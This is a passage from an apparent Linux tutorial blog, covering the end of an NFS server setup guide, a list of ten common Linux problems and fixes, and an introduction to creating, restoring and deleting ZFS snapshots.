Open your terminal and type:
sudo dnf install nfs-utils
To ensure NFS operates correctly, you’ll need to enable and start a few services:
sudo systemctl enable rpcbind nfs-server
sudo systemctl start rpcbind nfs-server
If the directory you wish to share is /home/your_user/shared, ensure it has the correct permissions. Note that on Red Hat-based systems the unprivileged group is nobody, not Debian’s nogroup:
sudo chown nobody:nobody /home/your_user/shared
Then, like with Ubuntu and Debian, modify the /etc/exports file:
sudo nano /etc/exports
And add:
/home/your_user/shared *(rw,sync,no_root_squash)
Be aware that no_root_squash lets a remote root user act as root on the share; use it only on trusted networks.
After setting up the shared directories, have NFS recognize the changes:
sudo exportfs -r
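On a client machine, the exported share can then be mounted at boot from /etc/fstab. A sketch assuming a hypothetical server address of 192.168.1.10:

```
192.168.1.10:/home/your_user/shared  /mnt/shared  nfs  defaults  0  0
```

Create the mount point first with sudo mkdir -p /mnt/shared, then run sudo mount -a to mount it immediately.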
Setting up NFS is easy, but don’t forget about security. Ensure you only share necessary directories and limit access to trusted IPs. Also, consider using firewalls and, if possible, further configurations like SELinux or AppArmor.
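The advice about limiting access to trusted IPs translates directly into /etc/exports syntax: replace the wildcard * with a host or network. A hypothetical entry restricting the share to a 192.168.1.0/24 LAN:

```
/home/your_user/shared 192.168.1.0/24(rw,sync,no_subtree_check)
```

Remember to run sudo exportfs -r after editing so the change takes effect.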
Now that you know how to set up an NFS server on the most popular distributions, it’s time for you to put it into practice. As you’ve seen, although there are some differences based on distribution, the process is pretty straightforward. No excuses not to have your NFS server up and running!
Always remember to test and backup before making changes in production environments. And if you ever feel lost, come back here; I’m here to help! Best of luck with your NFS journey!
10 Common Linux Problems and How to Solve Them
Imagine: you just did an update and suddenly, bam! Your system won’t boot. It’s a pain, but there’s a solution. Chances are, something with the kernel or the drivers isn’t playing nicely.
Solution: One option is to boot using an older kernel. When the GRUB menu (boot manager) appears, select an older version of the kernel. If everything runs smoothly, you might want to stick with that kernel until issues with the new one are resolved.
Sometimes, Linux can be a bit finicky with Wi-Fi drivers. If your connection isn’t working, you might need to install or update the appropriate driver.
Solution: Connect your computer to the Internet using an Ethernet cable and look for the right drivers for your Wi-Fi card. Typically, your distribution’s driver manager will provide options for installation.
If your display looks blurry or the resolution is off, Linux might not be correctly recognizing your monitor or graphics card.
Solution: Head to your system’s display settings and try different resolutions. If that doesn’t work, consider installing or updating the drivers for your graphics card.
Can’t hear anything? What a drag! But don’t get stressed, it’s often an easy fix.
Solution: First, ensure the sound isn’t muted and the volume is at an appropriate level. If that doesn’t do the trick, go to the sound manager and make sure the output is configured correctly. Lastly, if it’s still not working, you might need to install or update your sound drivers.
Linux has a plethora of software repositories, but sometimes, the program you want isn’t there.
Solution: Look for a .deb or .rpm package on the program’s official website. Once downloaded, open your distribution’s software center and follow the installation instructions. If the software doesn’t offer Linux packages, you could try tools like Wine to run Windows applications.
It’s rare, but it happens. If Linux freezes up on you, there are a couple of things you can try.
Solution: Attempt to switch to a virtual terminal by pressing Ctrl+Alt and an F key (from F1 to F7). From there, you can try restarting the graphical interface with sudo service lightdm restart, or the appropriate command for your display manager. If that doesn’t work, you might need to reboot your machine.
If you get a message saying you don’t have permission to access or modify a file, don’t despair.
Solution: Open a terminal and use the chmod command to change the file’s permissions. If you’re unsure how to use it, look up a guide on chmod and chown. But be careful and make sure you know what you’re doing.
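A minimal sketch of chmod in action, using a hypothetical file name:

```shell
# Create a file, then give the owner full access and everyone else read/execute
touch myscript.sh
chmod 755 myscript.sh   # equivalent to u=rwx,go=rx
ls -l myscript.sh       # the mode column now reads -rwxr-xr-x
```

The numeric form (755) and the symbolic form (u=rwx,go=rx) are interchangeable; the symbolic form is handy for tweaking a single permission bit without recomputing the whole mode.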
Sometimes, when you plug in a USB device, Linux doesn’t recognize it.
Solution: First, try plugging it into a different port. If that doesn’t work, open a terminal and type lsusb to see if the system recognizes it. If it’s on the list, you might just need to mount it manually.
On occasion, when trying to update, you can run into errors that prevent completion.
Solution: Open a terminal and run sudo apt-get update followed by sudo apt-get upgrade (or the corresponding commands for your package manager). If you encounter errors, try searching for them online; someone has likely already found a solution.
If you’re having trouble accessing a server via SSH, you’re not alone.
Solution: Make sure the SSH service is active on the server and that there’s no firewall blocking port 22. You might also need to generate or renew your SSH keys on your client machine.
And there you have it! Some of the most common issues you might encounter while using Linux and how to address them. Remember, the Linux community is vast and always willing to help, so if you hit a snag, someone else has likely been through it and can lend a hand. Keep up the spirit and enjoy Linux!
Everything You Need to Know About ZFS Snapshots
Before we delve into snapshots, let me give you some context on ZFS. It’s a file system and volume manager that is simply brilliant. Not just because of its advanced features, but also for its efficiency and flexibility.
A snapshot is like a photograph of your data at a specific moment. Imagine being able to freeze time and capture precisely how your files and folders look at that exact moment. That’s a snapshot. It’s an essential tool if you ever need to revert changes, recover lost data, or simply take a peek into the past.
ZFS has a peculiar feature called COW, which stands for Copy On Write. Basically, when you make changes, ZFS doesn’t rewrite your original data. Instead, it creates a new block for those changes. So, ZFS snapshots don’t take up extra space unless you modify the original data. Plus, creating a snapshot in ZFS takes only seconds, regardless of how much data you have.
To create a snapshot in ZFS, the command is straightforward: zfs snapshot. Let’s say you have a dataset named my_data and you want to take a snapshot of it. Just run:
zfs snapshot my_pool/my_data@snapshot_today
And there you go! You’ve captured a photograph of your dataset.
Ah, small detail. ZFS pools have a property called listsnapshots that controls whether snapshots appear in the output of zfs list. By default it is turned off, so a plain zfs list won’t show them; either list them explicitly with zfs list -t snapshot, or turn the property on.
If you suspect something’s up, check the status with:
zpool get listsnapshots pool_name
To disable or enable snapshot visibility, use:
zpool set listsnapshots=off pool_name
Or:
zpool set listsnapshots=on pool_name
Let’s say you made a mistake (hey, it happens to the best of us) and you want to revert to an earlier state of your data. ZFS snapshots are here to save the day. You can access the data from any snapshot by navigating to the .zfs/snapshot/ directory within the original dataset. From there, either copy what you need or restore the entire dataset.
If you want to take things a step further and restore your entire dataset to the state of a previous snapshot, there’s a command for that: zfs rollback. Keep in mind that it only reverts to the most recent snapshot; rolling back further requires destroying the intervening snapshots, which zfs rollback -r does for you. Let’s say you have a dataset called tank/home/matt and you want to return to the state of the snapshot named tuesday. Just do:
zfs rollback tank/home/matt@tuesday
This will bring everything back to how it was on that glorious Tuesday.
Spring Cleaning: Deleting Old Snapshots
As time goes by, you might accumulate a lot of snapshots. Some of them might not be needed anymore. To get rid of those old memories, use the command:
zfs destroy pool_name/dataset_name@snapshot_name
Yes, snapshots are great for recovering from mistakes, but there’s more to them. You can use them to test changes in a safe environment. If something goes wrong, just revert to the snapshot, and you’re good. They’re also excellent tools for backing up and replicating data to other systems.
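The backup use mentioned above is easy to automate. As a sketch, a system crontab entry that takes a dated snapshot every night, reusing the hypothetical pool and dataset names from earlier (note that % must be escaped in crontab lines):

```
# /etc/crontab — snapshot my_pool/my_data at 02:00 every day
0 2 * * * root /sbin/zfs snapshot my_pool/my_data@daily-$(date +\%Y\%m\%d)
```

Pair this with periodic zfs destroy of snapshots older than your retention window so they don’t accumulate indefinitely.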
ZFS snapshots aren’t just another feature. They’re a testament to the power and versatility of this file system. Now that you’re well-acquainted with them, I hope you’ll make the most out of them.
Migrating and cloning with snapshots, ensuring security and privacy, and the joys of automation await you in the world of ZFS. Dive in, create your snapshots, and discover all they can offer you.
Until our next tech adventure! Enjoy ZFS and harness its full potential!